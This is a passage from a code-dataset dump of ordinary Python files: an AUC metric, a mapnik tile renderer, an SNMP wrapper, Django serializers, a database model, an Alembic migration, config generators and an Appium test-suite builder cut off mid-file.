res['neg'] = num_neg\n if num_pos * num_neg == 0:\n res['auc'] = 1\n else:\n res['auc'] = (sum_pos - (num_pos) * (num_pos + 1) / 2) / float(num_pos * num_neg)\n return res\n\ndef print_step_auc(predict, labels):\n assert predict.shape == labels.shape\n batch_size, step, size_x, size_y = predict.shape\n res = []\n for istep in range(step):\n stepauc = calc_auc(predict[:,istep,:,:], labels[:,istep,:,:])\n res.append(stepauc['auc'])\n print ('step: %5d, auc: %f, pos:%f, neg:%f' % (istep, stepauc['auc'],\n stepauc['pos'], stepauc['neg']))\n return res\n\n\nif __name__ == '__main__':\n print (calc_auc([0.1, 0.2, 0.3, 0.4, 0.5], [0, 1, 0, 1, 1])['auc'])\n","sub_path":"meval.py","file_name":"meval.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60575796","text":"from math import pi,cos,sin,log,exp,atan, tan, radians, sinh, degrees\nimport sys, os, time\nfrom queue import Queue\nimport threading\nfrom PyQt4.QtCore import SIGNAL, QObject\n\ndisableMappnik=False\ntry:\n import mapnik2\nexcept ImportError:\n print(\"mapnik is 
disabled\")\n disableMappnik=True\n\nDEG_TO_RAD = pi/180\nRAD_TO_DEG = 180/pi\nMAX_ZOOM=18\nTILESIZE=256\n\ndef minmax (a,b,c):\n a = max(a,b)\n a = min(a,c)\n return a\n\nclass GoogleProjection:\n def __init__(self,levels=18):\n self.Bc = []\n self.Cc = []\n self.zc = []\n self.Ac = []\n c = TILESIZE\n for d in range(0,levels):\n e = c/2;\n self.Bc.append(c/360.0)\n self.Cc.append(c/(2 * pi))\n self.zc.append((e,e))\n self.Ac.append(c)\n c *= 2\n \n def fromLLtoPixel(self,ll,zoom):\n d = self.zc[zoom]\n e = round(d[0] + ll[0] * self.Bc[zoom])\n f = minmax(sin(DEG_TO_RAD * ll[1]),-0.9999,0.9999)\n g = round(d[1] + 0.5*log((1+f)/(1-f))*-self.Cc[zoom])\n return (e,g)\n \n def fromPixelToLL(self,px,zoom):\n e = self.zc[zoom]\n f = (px[0] - e[0])/self.Bc[zoom]\n g = (px[1] - e[1])/-self.Cc[zoom]\n h = RAD_TO_DEG * ( 2 * atan(exp(g)) - 0.5 * pi)\n return (f,h)\n\ndef deg2num(lat_deg, lon_deg, zoom):\n lat_rad = radians(lat_deg)\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((1.0 - log(tan(lat_rad) + (1 / cos(lat_rad))) / pi) / 2.0 * n)\n return (xtile, ytile)\n\ndef num2deg(xtile, ytile, zoom):\n n = 2.0 ** zoom\n lon_deg = xtile / n * 360.0 - 180.0\n lat_rad = atan(sinh(pi * (1 - 2 * ytile / n)))\n lat_deg = degrees(lat_rad)\n return (lat_deg, lon_deg)\n\nclass RenderThread:\n def __init__(self, m, prj, tileproj):\n self.m=m\n self.prj=prj\n self.tileproj = tileproj\n\n def render_tile(self, tile_uri, x, y, z):\n # Calculate pixel positions of bottom-left & top-right\n# start=time.time()\n# p0 = (x * TILESIZE, (y + 1) * TILESIZE)\n# p1 = ((x + 1) * TILESIZE, y * TILESIZE)\n#\n# # Convert to LatLong (EPSG:4326)\n# l0 = self.tileproj.fromPixelToLL(p0, z);\n# l1 = self.tileproj.fromPixelToLL(p1, z);\n#\n# # Convert to map projection (e.g. mercator co-ords EPSG:900913)\n# c0 = self.prj.forward(mapnik2.Coord(l0[0],l0[1]))\n# c1 = self.prj.forward(mapnik2.Coord(l1[0],l1[1]))\n\n l0y, l0x=num2deg(x, y+1, z)\n l1y, l1x=num2deg(x+1, y, z)\n \n # Convert to map projection (e.g. 
mercator co-ords EPSG:900913)\n c0 = self.prj.forward(mapnik2.Coord(l0x,l0y))\n c1 = self.prj.forward(mapnik2.Coord(l1x,l1y))\n\n # Bounding box for the tile\n if hasattr(mapnik2,'mapnik_version') and mapnik2.mapnik_version() >= 800:\n bbox = mapnik2.Box2d(c0.x,c0.y, c1.x,c1.y)\n else:\n bbox = mapnik2.Envelope(c0.x,c0.y, c1.x,c1.y)\n render_size = TILESIZE\n self.m.resize(render_size, render_size)\n self.m.zoom_to_box(bbox)\n self.m.buffer_size = 128\n\n # Render image with default Agg renderer\n im = mapnik2.Image(render_size, render_size)\n# print(\"%f\"%(time.time()-start))\n# start=time.time()\n mapnik2.render(self.m, im)\n# print(\"%f\"%(time.time()-start))\n# start=time.time()\n im.save(tile_uri, 'png256')\n# print(\"%f\"%(time.time()-start))\n\nclass MapnikWrapper(QObject):\n def __init__(self, d, m):\n QObject.__init__(self)\n self.map_file=m\n self.tile_dir=d\n if not self.tile_dir.endswith('/'):\n self.tile_dir = self.tile_dir + '/'\n \n if not os.path.isdir(self.tile_dir):\n os.makedirs(self.tile_dir)\n\n self.m = mapnik2.Map(TILESIZE, TILESIZE)\n mapnik2.load_map(self.m, self.map_file, True)\n self.prj = mapnik2.Projection(self.m.srs)\n self.tileproj = GoogleProjection(MAX_ZOOM+1)\n self.render_thread = RenderThread(self.m, self.prj, self.tileproj)\n\n def render_tiles(self, bbox, zoom, name=\"unknown\", tms_scheme=False):\n# print(self.tile_dir)\n \n ll0 = (bbox[0],bbox[3])\n ll1 = (bbox[2],bbox[1])\n z=zoom\n \n px0 = self.tileproj.fromLLtoPixel(ll0,z)\n px1 = self.tileproj.fromLLtoPixel(ll1,z)\n\n # check if we have directories in place\n zoom = \"%s\" % z\n# if not os.path.isdir(self.tile_dir + zoom):\n# os.mkdir(self.tile_dir + zoom)\n for x in range(int(px0[0]/TILESIZE),int(px1[0]/TILESIZE)+1):\n # Validate x co-ordinate\n if (x < 0) or (x >= 2**z):\n continue\n # check if we have directories in place\n str_x = \"%s\" % x\n if not os.path.isdir(self.tile_dir + zoom + '/' + str_x):\n os.mkdir(self.tile_dir + zoom + '/' + str_x)\n for y in range(int(px0[1]/TILESIZE),int(px1[1]/TILESIZE)+1):\n # Validate x co-ordinate\n if (y < 0) or (y >= 2**z):\n continue\n # flip y to match OSGEO TMS spec\n if tms_scheme:\n str_y = \"%s\" % ((2**z-1) - y)\n else:\n str_y = \"%s\" % y\n tile_uri = self.tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'\n exists= \"\"\n if os.path.isfile(tile_uri):\n exists= \"exists\"\n else:\n self.render_thread.render_tile(tile_uri, x, y, z) \n# self.emit(SIGNAL(\"updateMap()\")) \n# print(name, \":\", z, x, y, exists)\n\n def render_tiles2(self, bbox, zoom, name=\"unknown\", tms_scheme=False):\n# print(self.tile_dir)\n \n px0 = (bbox[0],bbox[3])\n px1 = (bbox[2],bbox[1])\n z=zoom\n \n# px0 = self.tileproj.fromLLtoPixel(ll0,z)\n# px1 = self.tileproj.fromLLtoPixel(ll1,z)\n\n # check if we have directories in place\n zoom = \"%s\" % z\n# if not os.path.isdir(self.tile_dir + zoom):\n# os.mkdir(self.tile_dir + zoom)\n for x in range(int(px0[0]/TILESIZE),int(px1[0]/TILESIZE)+1):\n # Validate x co-ordinate\n if (x < 0) or (x >= 2**z):\n continue\n # check if we have directories in place\n str_x = \"%s\" % x\n if not os.path.isdir(self.tile_dir + zoom + '/' + str_x):\n os.mkdir(self.tile_dir + zoom + '/' + str_x)\n for y in range(int(px0[1]/TILESIZE),int(px1[1]/TILESIZE)+1):\n # Validate x co-ordinate\n if (y < 0) or (y >= 2**z):\n continue\n # flip y to match OSGEO TMS spec\n if tms_scheme:\n str_y = \"%s\" % ((2**z-1) - y)\n else:\n str_y = \"%s\" % y\n tile_uri = self.tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'\n exists= \"\"\n if 
os.path.isfile(tile_uri):\n exists= \"exists\"\n else:\n self.render_thread.render_tile(tile_uri, x, y, z) \n# self.emit(SIGNAL(\"updateMap()\")) \n# print(name, \":\", z, x, y, exists)\n\n def render_tiles3(self, x, y, zoom, name=\"unknown\", tms_scheme=False):\n# print(self.tile_dir)\n \n z=zoom\n\n # check if we have directories in place\n zoom = \"%s\" % z\n# if not os.path.isdir(self.tile_dir + zoom):\n# os.mkdir(self.tile_dir + zoom)\n \n # Validate x co-ordinate\n if (x < 0) or (x >= 2**z):\n return\n \n # check if we have directories in place\n str_x = \"%s\" % x\n if not os.path.isdir(self.tile_dir + zoom + '/' + str_x):\n os.mkdir(self.tile_dir + zoom + '/' + str_x)\n\n # Validate x co-ordinate\n if (y < 0) or (y >= 2**z):\n return\n \n # flip y to match OSGEO TMS spec\n if tms_scheme:\n str_y = \"%s\" % ((2**z-1) - y)\n else:\n str_y = \"%s\" % y\n tile_uri = self.tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'\n# exists= \"\"\n# if os.path.isfile(tile_uri):\n# exists= \"exists\"\n# else:\n self.render_thread.render_tile(tile_uri, x, y, z) \n# self.emit(SIGNAL(\"updateMap()\")) \n# print(z, x, y) \n","sub_path":"mapnik/mapnikwrapper.py","file_name":"mapnikwrapper.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"555543289","text":"from pysnmp.entity.rfc3413.oneliner import cmdgen\nfrom pyasn1.type.univ import Null, OctetString, Integer\n\nclass Oid(object):\n \n def __init__(self, oid, name=None):\n self.oid = oid\n self.name = name\n self.value = None\n \n def isnull(self):\n return isinstance(self.value, Null)\n\n def isstring(self):\n return isinstance(self.value, OctetString)\n\n def isnumber(self):\n return isinstance(self.value, Integer)\n\n def __repr__(self):\n return \"%s:%s\" % (self.name, self.value)\n\nclass SNMPWrapException(Exception):\n pass\n\nclass SNMPWrap(object):\n \n def __init__(self, host):\n self.host = unicode(host)\n\n def __call__(self, start=0, count=1, *args):\n\n oids = []\n for i in range(count):\n for obj in args:\n oids.append(obj.oid + (start + i,))\n \n errorIndication, errorStatus, errorIndex, varBinds = \\\n cmdgen.CommandGenerator().getCmd(\n cmdgen.CommunityData('test-agent', 'public'),\n cmdgen.UdpTransportTarget((self.host, 161)),\n *oids\n )\n\n if errorIndication:\n raise SNMPWrapException(errorIndication)\n else:\n if errorStatus:\n raise SNMPWrapException('%s at %s' % (errorStatus.prettyPrint(),\n varBinds[int(errorIndex)-1]))\n\n ret = []\n bit = []\n i = 0\n ret.append(bit)\n for pair in varBinds:\n if i > 0 and i % len(args) == 0:\n ret.append(bit)\n bit = []\n o = Oid(pair[0], args[i % len(args)].name)\n o.value = pair[1]\n bit.append(o)\n i += 1\n\n return ret\n","sub_path":"labinventory/asset/utils/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161853192","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User\nfrom base.serializers import BaseSerializer\nfrom .models import (\n Organization,\n StaffCount,\n OrganizationPicture,\n Staff,\n Follow,\n Ability,\n Confirmation,\n Customer,\n MetaData\n)\nfrom users.serializers import UserMiniSerializer, IdentityMiniSerializer\nfrom users.models import Identity, Profile, StrengthStates, WorkExperience\n\n\nclass OrganizationSerializer(BaseSerializer):\n class Meta:\n model = Organization\n exclude = ['child_name']\n 
extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n validated_data.pop('admins')\n if 'owner' not in validated_data or not request.user.is_superuser:\n validated_data['owner'] = request.user\n organization = Organization.objects.create(**validated_data)\n organization.save()\n return organization\n\n def update(self, instance, validated_data):\n request = self.context.get('request')\n if 'owner' not in validated_data or not request.user.is_superuser:\n instance.owner = request.user\n else:\n instance.owner = validated_data.get('owner', None)\n\n # set validated data to organization instance\n for key in validated_data:\n if key != 'owner':\n setattr(instance, key, validated_data.get(key))\n instance.save()\n return instance\n\n\nclass MetaDataSerializer(BaseSerializer):\n class Meta:\n model = MetaData\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n if validated_data['meta_type'] == 'address':\n identity_meta_data = MetaData.objects.filter(meta_identity=validated_data['meta_identity'],\n meta_type=validated_data['meta_type'])\n if identity_meta_data.count() >= 3:\n error = {'message': \"organization have more than 3 \" + validated_data['meta_type'] + ' !'}\n raise serializers.ValidationError(error)\n elif len(validated_data['meta_value']) > 100:\n error = {'message': \"organization have more than 100 character !\"}\n raise serializers.ValidationError(error)\n elif validated_data['meta_type'] == 'address':\n identity_meta_data = MetaData.objects.filter(meta_identity=validated_data['meta_identity'],\n meta_type=validated_data['meta_type'])\n if identity_meta_data.count() >= 4:\n error = {'message': \"organization have more than 4 \" + validated_data['meta_type'] + ' !'}\n raise serializers.ValidationError(error)\n elif len(validated_data['meta_value']) > 20:\n error = {'message': \"organization have more than 20 character !\"}\n raise serializers.ValidationError(error)\n meta_data = MetaData.objects.create(**validated_data)\n meta_data.save()\n return meta_data\n\n\nclass MetaDataField(serializers.Field):\n\n def to_representation(self, obj):\n ret = []\n meta_data = MetaData.objects.filter(meta_organization_id=obj.id)\n if meta_data.count() != 0:\n for meta_item in meta_data:\n meta_object = {\n 'id': meta_item.id,\n 'meta_type': meta_item.meta_type,\n 'meta_title': meta_item.meta_title,\n 'meta_value': meta_item.meta_value\n }\n ret.append(meta_object)\n return ret\n\n def to_internal_value(self, data):\n ret = []\n return ret\n\n\nclass OrganizationListViewSerializer(BaseSerializer):\n owner = UserMiniSerializer()\n meta_data = MetaDataField(source='*', read_only=True)\n\n class Meta:\n model = Organization\n fields = ['id', 'owner', 'admins', 'username', 'email', 'nike_name', 'official_name', 'national_code',\n 'meta_data']\n\n\nclass OrganizationGetObjectSerializer(BaseSerializer):\n class Meta:\n model = Organization\n depth = 1\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass StaffCountSerializer(BaseSerializer):\n class Meta:\n model = StaffCount\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True},\n 'staff_count_organization': {'required': False}\n }\n\n\nclass OrganizationPictureSerializer(BaseSerializer):\n class Meta:\n model = OrganizationPicture\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n 
}\n\n\nclass StaffListViewSerializer(BaseSerializer):\n staff_user = UserMiniSerializer()\n\n class Meta:\n model = Staff\n fields = ['id', 'staff_user', 'position', 'staff_organization']\n\n\nclass StaffSerializer(BaseSerializer):\n class Meta:\n model = Staff\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass FollowSerializer(BaseSerializer):\n class Meta:\n model = Follow\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True},\n 'follow_follower': {'required': False}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n # if (request.user.is_superuser and 'follow_follower' not in validated_data) or not request.user.is_superuser:\n if 'follow_follower' not in validated_data:\n identity = Identity.objects.get(identity_user=request.user)\n validated_data['follow_follower'] = identity\n follow = Follow.objects.create(**validated_data)\n follow.save()\n # self.check_follow_profile_strength(validated_data['follow_follower'])\n return follow\n\n def check_follow_profile_strength(self, identity):\n user = User.objects.get(pk=identity.identity_user_id)\n follows = Follow.objects.filter(follow_follower=identity)\n try:\n user_strength = StrengthStates.objects.get(strength_user=user)\n except StrengthStates.DoesNotExist:\n user_strength = StrengthStates.objects.create(strength_user=user)\n if user_strength.follow_obtained is False and follows.count() == 3:\n profile = Profile.objects.get(profile_user=user)\n profile.profile_strength += 5\n profile.save()\n user_strength.follow_obtained = True\n user_strength.save()\n\n\nclass FollowListSerializer(BaseSerializer):\n class Meta:\n model = Follow\n exclude = ['child_name']\n depth = 1\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass AbilitySerializer(BaseSerializer):\n class Meta:\n model = Ability\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass ConfirmationSerializer(BaseSerializer):\n class Meta:\n model = Confirmation\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n if 'confirmation_corroborant' not in validated_data or not request.user.is_superuser:\n identity = Identity.objects.get(identity_user=request.user)\n validated_data['confirmation_corroborant'] = identity\n if 'confirmation_confirmed' in validated_data:\n validated_data.pop('confirmation_confirmed', None)\n confirmation = Confirmation.objects.create(**validated_data)\n confirmation.save()\n return confirmation\n\n def update(self, instance, validated_data):\n if 'confirm_flag' in validated_data:\n experience = WorkExperience.objects.get(pk=instance.confirmation_parent_id)\n if validated_data.get('confirm_flag') is True:\n experience.status = \"CONFIRMED\"\n else:\n experience.status = \"WITHOUT_CONFIRM\"\n experience.save()\n if validated_data.get('confirm_flag') is True:\n organization = Organization.objects.filter(id=experience.work_experience_organization_id)[0]\n organization.staff_count = WorkExperience.objects.filter(work_experience_organization_id=organization.id, status=\"CONFIRMED\").count()\n organization.save()\n for key in validated_data:\n setattr(instance, key, validated_data.get(key))\n instance.save()\n return instance\n\n\nclass ConfirmationListViewSerializer(BaseSerializer):\n confirmation_corroborant = IdentityMiniSerializer()\n confirmation_confirmed = 
IdentityMiniSerializer()\n\n    class Meta:\n        model = Confirmation\n        exclude = ['updated_time', 'child_name']\n\n\nclass CustomerSerializer(BaseSerializer):\n    class Meta:\n        model = Customer\n        exclude = ['child_name']\n        extra_kwargs = {\n            'updated_time': {'read_only': True}\n        }\n\n    def create(self, validated_data):\n        request = self.context.get('request')\n        if 'related_customer' not in validated_data or not request.user.is_superuser:\n            identity = Identity.objects.get(identity_user=request.user)\n            validated_data['related_customer'] = identity\n        customer = Customer.objects.create(**validated_data)\n        customer.save()\n        return customer\n\n\nclass CustomerListSerializer(BaseSerializer):\n    class Meta:\n        model = Customer\n        exclude = ['child_name']\n        depth = 1","sub_path":"organizations/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":9894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"146574080","text":"#!/bin/python\n# coding:utf8\nfrom connect import Connect\nimport time\n\n\nclass NoticesModel(Connect):\n    \"\"\"Connect to the database\"\"\"\n    table = 'mv_stock_notices'\n    instance = None\n\n    def __init__(self):\n        Connect.__init__(self)\n\n    # Singleton pattern\n    @classmethod\n    def getInstance(cls):\n        if not cls.instance:\n            cls.instance = NoticesModel()\n        return cls.instance\n\n    # Check existence: returns True when the (sid, secu_code) pair is NOT in the table yet\n    def isExist(self, sid, code):\n        sql = \"select count(*) from mv_stock_notices where sid='%s' and secu_code = '%s'\" % (sid, code)\n        self.cur.execute(sql)\n        res = self.cur.fetchone()\n        if res[0] > 0:\n            return False\n        else:\n            return True\n    # Insert a new row\n    def insert(self, param):\n        timeData = int(time.time())\n\n        sql = \"insert into mv_stock_notices(sid,secu_code,title,url,date,create_time,update_time) values('%s','%s','%s','%s','%s',%d,%d)\" % (\n            param['sid'], param['secu_code'], param['title'], param['url'], param['date'], timeData, timeData);\n        try:\n            self.cur.execute(sql)\n            self.con.commit()\n        except Exception as e:\n            self.con.rollback()\n\n\n","sub_path":"stock/model/notices.py","file_name":"notices.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"264886146","text":"\"\"\"refactor to more flexible object relations\n\nRevision ID: 774bc60b4a6\nRevises: 10eb9ecd9886\nCreate Date: 2016-04-11 18:17:02.372814\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nfrom sqlalchemy_utils import ChoiceType\n\nfrom alchemist.models.company_company import TypeOfRelation as cxc_TOR\nfrom alchemist.models.user_company import TypeOfRelation\n\nrevision = '774bc60b4a6'\ndown_revision = '10eb9ecd9886'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust!
###\n op.create_table('company_x_company',\n sa.Column('left_id', sa.Integer(), nullable=False),\n sa.Column('right_id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.Unicode(), nullable=True),\n sa.Column('relation', ChoiceType(cxc_TOR, impl=sa.Integer()), nullable=True),\n sa.ForeignKeyConstraint(['left_id'], ['company.id'], ),\n sa.ForeignKeyConstraint(['right_id'], ['company.id'], ),\n sa.PrimaryKeyConstraint('left_id', 'right_id', 'relation')\n )\n\n migrate_wishlist = \"insert into company_x_company (left_id, right_id, relation) \" \\\n \"(select company_id, wishlist_company_id, %d from wishlist_x_company)\" \\\n % cxc_TOR.wishlistcustomer\n migrate_notable = \"insert into company_x_company (left_id, right_id, relation) \" \\\n \"(select company_id, notable_company_id, %d from notablecustomers_x_company)\" \\\n % int(cxc_TOR.notablecustomer)\n op.execute(migrate_wishlist)\n op.execute(migrate_notable)\n op.drop_table('wishlist_x_company')\n op.drop_table('notablecustomers_x_company')\n\n op.create_index(op.f('ix_company_x_company_comment'), 'company_x_company', ['comment'], unique=False)\n op.create_index(op.f('ix_company_x_company_left_id'), 'company_x_company', ['left_id'], unique=False)\n op.create_index(op.f('ix_company_x_company_relation'), 'company_x_company', ['relation'], unique=False)\n op.create_index(op.f('ix_company_x_company_right_id'), 'company_x_company', ['right_id'], unique=False)\n op.create_table('user_x_company',\n sa.Column('company_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('end_date', sa.Date(), nullable=True),\n sa.Column('start_date', sa.Date(), nullable=True),\n sa.Column('title', sa.Unicode(), nullable=True),\n sa.Column('relation', ChoiceType(TypeOfRelation, impl=sa.Integer()), nullable=True),\n sa.ForeignKeyConstraint(['company_id'], ['company.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('company_id', 'user_id', 'relation')\n )\n migrate_user_company = 'insert into user_x_company (company_id, user_id, relation) ' \\\n '(SELECT company_id, id, 0 from \"user\" where company_id is not null)'\n op.execute(migrate_user_company)\n op.create_index(op.f('ix_user_x_company_company_id'), 'user_x_company', ['company_id'], unique=False)\n op.create_index(op.f('ix_user_x_company_end_date'), 'user_x_company', ['end_date'], unique=False)\n op.create_index(op.f('ix_user_x_company_relation'), 'user_x_company', ['relation'], unique=False)\n op.create_index(op.f('ix_user_x_company_start_date'), 'user_x_company', ['start_date'], unique=False)\n op.create_index(op.f('ix_user_x_company_title'), 'user_x_company', ['title'], unique=False)\n op.create_index(op.f('ix_user_x_company_user_id'), 'user_x_company', ['user_id'], unique=False)\n op.create_table('user_x_user',\n sa.Column('left_id', sa.Integer(), nullable=False),\n sa.Column('right_id', sa.Integer(), nullable=False),\n sa.Column('relation', sa.Unicode(), nullable=True),\n sa.ForeignKeyConstraint(['left_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['right_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('left_id', 'right_id')\n )\n op.create_index(op.f('ix_user_x_user_left_id'), 'user_x_user', ['left_id'], unique=False)\n op.create_index(op.f('ix_user_x_user_relation'), 'user_x_user', ['relation'], unique=False)\n op.create_index(op.f('ix_user_x_user_right_id'), 'user_x_user', ['right_id'], unique=False)\n\n op.drop_index('ix_company_privatefields_values', table_name='company')\n op.drop_column('company', 
'privatefields_values')\n op.drop_index('ix_user_company_id', table_name='user')\n op.drop_index('ix_user_weekly_focus', table_name='user')\n op.drop_constraint(u'user_company_id_fkey', 'user', type_='foreignkey')\n op.drop_column('user', 'weekly_focus')\n op.drop_column('user', 'company_id')\n op.drop_column('user', 'name')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('name', sa.VARCHAR(length=200), autoincrement=False, nullable=True))\n op.add_column('user', sa.Column('company_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.add_column('user', sa.Column('weekly_focus', sa.VARCHAR(length=100), autoincrement=False, nullable=True))\n op.create_foreign_key(u'user_company_id_fkey', 'user', 'company', ['company_id'], ['id'])\n op.create_index('ix_user_weekly_focus', 'user', ['weekly_focus'], unique=False)\n op.create_index('ix_user_company_id', 'user', ['company_id'], unique=False)\n\n op.drop_index(op.f('ix_connection_message'), table_name='connection')\n op.add_column('company',\n sa.Column('privatefields_values', sa.TEXT(), server_default=sa.text(u\"''::text\"), autoincrement=False,\n nullable=True))\n op.create_index('ix_company_privatefields_values', 'company', ['privatefields_values'], unique=False)\n op.create_index('company_name_unix', 'company', ['name'], unique=True)\n\n op.drop_index(op.f('ix_user_x_user_right_id'), table_name='user_x_user')\n op.drop_index(op.f('ix_user_x_user_relation'), table_name='user_x_user')\n op.drop_index(op.f('ix_user_x_user_left_id'), table_name='user_x_user')\n op.drop_table('user_x_user')\n op.drop_index(op.f('ix_user_x_company_user_id'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_title'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_start_date'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_relation'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_end_date'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_company_id'), table_name='user_x_company')\n op.drop_table('user_x_company')\n op.drop_index(op.f('ix_company_x_company_right_id'), table_name='company_x_company')\n op.drop_index(op.f('ix_company_x_company_relation'), table_name='company_x_company')\n op.drop_index(op.f('ix_company_x_company_left_id'), table_name='company_x_company')\n op.drop_index(op.f('ix_company_x_company_comment'), table_name='company_x_company')\n op.drop_table('company_x_company')\n ### end Alembic commands ###\n","sub_path":"migrate-alembic/versions/774bc60b4a6_refactor_to_more_flexible_object_.py","file_name":"774bc60b4a6_refactor_to_more_flexible_object_.py","file_ext":"py","file_size_in_byte":7420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"190622702","text":"import json, os, sys\n\n'''\nExample of how to write JSON config files for a hyperparameter search.\nAfter you've written the files you can call them with something like\npython train.py --config_file=\n\nThe json files can be loaded to a python dict using\nwith open(path_to_config_file, 'r') as f:\n configs = json.load(f)\n'''\n\ndef main(output_dir):\n\n '''dataname = ['EDonnerFlanger']\n\n frcut = [2,3,4,6]\n for each in frcut:\n dataname.append('EDonnerFlangerfrcut' + str(each))\n\n MxErcut = [2,5,10,15]\n for each in MxErcut:\n dataname.append('EDonnerFlangerMxErcut' + str(each))\n\n AvErcut = [200,400,800, 1600, 2000]\n 
for each in AvErcut:\n        dataname.append('EDonnerFlangerAvErcut' + str(each))'''\n    dataname = []\n    Singles = 16\n    for each in range(16):\n        dataname.append('EDonnerFlangerSingles' + str(each + 1))\n\n    hids = [16]\n\n\n\n    if not os.path.exists(output_dir):\n        os.makedirs(output_dir)\n    i = 70\n\n    for pedals in dataname:\n        for hid in hids:\n            configs = {'pedal': pedals,\n                       'hidden_size': hid}\n            filename = 'config{:01}.json'.format(i)\n            with open(os.path.join(output_dir, filename), 'w') as f:\n                json.dump(configs, f)  # Write the dict to JSON\n            i += 1\n\nif __name__ == '__main__':\n    usage = 'usage: python hyperparameter_configs.py <output_dir>'\n    try:\n        output_dir = sys.argv[1]\n        if sys.argv[1] == '--help' or sys.argv[1] == '-h':\n            print(usage)\n            sys.exit(0)\n    except IndexError:\n        print(usage)\n        sys.exit(1)\n    main(output_dir)","sub_path":"NNetz/hyper_configs.py","file_name":"hyper_configs.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"329087820","text":"#!/usr/bin/env python\n\nfrom insilico.runner import run_workflow\nfrom insilico.validate_input import validate_input\nimport argparse\n\nmsg = \"python run_filter.py -i input.yml\"\nparser = argparse.ArgumentParser(description=msg)\n\nparser.add_argument('-i', required=True, help=\"Input file in YAML format\")\n\n\ndef main():\n    args = parser.parse_args()\n    inp = validate_input(args.i)\n    run_workflow(inp)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"scripts/filter/run_filters.py","file_name":"run_filters.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"480794400","text":"#encoding:utf-8\nimport unittest\nimport sys\nPROJECT_PATH = r\"D:\\python\\Test_App\\osc_test\"\nsys.path.append(PROJECT_PATH)\nfrom login.LoginCheck import LoginCheck\nfrom login.LoginPermissionCheck import LoginPremissionCheck\nfrom versioncheck.VersionCheck import VersionCheck\nfrom myreadcheck.MyReadsCheck import MyReadsCheck\nfrom share_crossapp.ShareMoment import ShareMoment\nfrom share_crossapp.ShareMsg import ShareMsg\nfrom share_crossapp.ShareTOQQ import ShareToQQ\nfrom webview.WebView import WebView\nfrom utils.MailUtils import MailUtils\nfrom HTMLTestRunner import HTMLTestRunner\nimport time\nimport os\n\n\ndef getSuite():\n    login_test_cases = unittest.TestLoader().loadTestsFromTestCase(LoginCheck)\n    loginPremission_test_cases = unittest.TestLoader().loadTestsFromTestCase(LoginPremissionCheck)\n    versionCheck_test_cases = unittest.TestLoader().loadTestsFromTestCase(VersionCheck)\n    myreads_test_cases = unittest.TestLoader().loadTestsFromTestCase(MyReadsCheck)\n    sharemsg_test_cases = unittest.TestLoader().loadTestsFromTestCase(ShareMsg)\n    sharemoment_test_cases = unittest.TestLoader().loadTestsFromTestCase(ShareMoment)\n    sharetoQQ_test_cases = unittest.TestLoader().loadTestsFromTestCase(ShareToQQ)\n    webview_test_cases = unittest.TestLoader().loadTestsFromTestCase(WebView)\n    suite = unittest.TestSuite()\n    #suite.addTests([login_test_cases,])\n    suite.addTests([loginPremission_test_cases,login_test_cases,\\\n                    versionCheck_test_cases,myreads_test_cases, \\\n                    sharemsg_test_cases,sharemoment_test_cases,\n                    